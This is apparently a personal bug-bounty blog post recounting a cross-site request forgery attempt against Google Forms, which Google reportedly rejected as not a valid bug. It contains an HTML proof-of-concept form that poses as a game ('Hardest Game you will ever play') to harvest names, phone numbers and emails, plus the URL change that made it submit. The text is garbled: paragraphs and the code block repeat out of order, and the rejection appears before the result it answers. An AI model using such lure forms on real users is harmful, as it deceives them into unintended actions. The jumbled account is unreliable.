Bug discovered: 26th December 2016. Research time: 8:30 p.m - 10:00 p.m
Earn more by display ads on blog with Lithific Ads
CSRF is an abbreviation for Cross-site Request Forgery. Web applications issue anti-CSRF tokens when a user requests for actions like Submitting a form, so that the request originates exclusively from that domain. This vulnerability comes into play when the server is not validating the anti-CSRF tokens, through this vulnerability you can make a user perform some actions even though he/she didn't intend to do that.
Want to get icons for app Development Here it's
I wrote a HTML code for submitting the form.
<html>
<form action="[url]" target="_self" method="POST" id="[form-specified]">
<h1>Hardest Game you will ever play !</h1>
<p>We want to rate the users based on their high scores</p>
<input type="text" class="quantumWizTextinputPaperinputInput exportInput" jsname="[form-specified]" aria-label="Test Name" aria-describedby="[form-specified]" name="[form-specified]" value="" placeholder="Name"/>
<input type="text" class="[form-specified]" jsname="[form-specified]" aria-label="Age" aria-describedby="[form-specified]" name="[form-specified]" value="" placeholder="Phone number"/>
<input type="text" class="[form-specified]" jsname="[form-specified]" aria-label="NAME" aria-describedby="[form-specified]" name="[form-specified]" value="" placeholder="Email-id"/>
<input type="submit" value="Play it !">
</form>
</html>
With [url] = https://docs.google.com/forms/d/e/1FAIpQLSe-tPi2TK2ac5Jp6J8-ea1BZqctKn0vbxMZgxPUZr7O2-2wKQ/viewform?c=0&w=1&usp=mail_form_link in the action attribute value.
When the browser renders the code it would be...
The fields were filled and when the Play it ! button was clicked, the response was...
The following day I got response that this is not a valid bug because it will not edit the user's response or delete the responses :(
<html>
<form action="[url]" target="_self" method="POST" id="[form-specified]">
<h1>Hardest Game you will ever play !</h1>
<p>We want to rate the users based on their high scores</p>
<input type="text" class="quantumWizTextinputPaperinputInput exportInput" jsname="[form-specified]" aria-label="Test Name" aria-describedby="[form-specified]" name="[form-specified]" value="" placeholder="Name"/>
<input type="text" class="[form-specified]" jsname="[form-specified]" aria-label="Age" aria-describedby="[form-specified]" name="[form-specified]" value="" placeholder="Phone number"/>
<input type="text" class="[form-specified]" jsname="[form-specified]" aria-label="NAME" aria-describedby="[form-specified]" name="[form-specified]" value="" placeholder="Email-id"/>
<input type="submit" value="Play it !">
</form>
</html>
With [url] = https://docs.google.com/forms/d/e/1FAIpQLSe-tPi2TK2ac5Jp6J8-ea1BZqctKn0vbxMZgxPUZr7O2-2wKQ/viewform?c=0&w=1&usp=mail_form_link in the action attribute value.
When the browser renders the code it would be...
Didn't work :(
I changed the end of the [url] = https://docs.google.com/forms/d/e/[form-id]/formResponse?edit2=[invalid-value]
The HTML code was rendered, all the fields were filled and when Play it! was clicked, the form got submitted.
I changed the end of the [url] = https://docs.google.com/forms/d/e/[form-id]/formResponse?edit2=[invalid-value]
The HTML code was rendered, all the fields were filled and when Play it! was clicked, the form got submitted.
It WORKED !!!!!!!!!!!!!!!!!!!!!!!!!!!
I submitted this bug to google and it was reproduced within 3 hours.
I submitted this bug to google and it was reproduced within 3 hours.
The following day I got response that this is not a valid bug because it will not edit the user's response or delete the responses :(
Comments
Post a Comment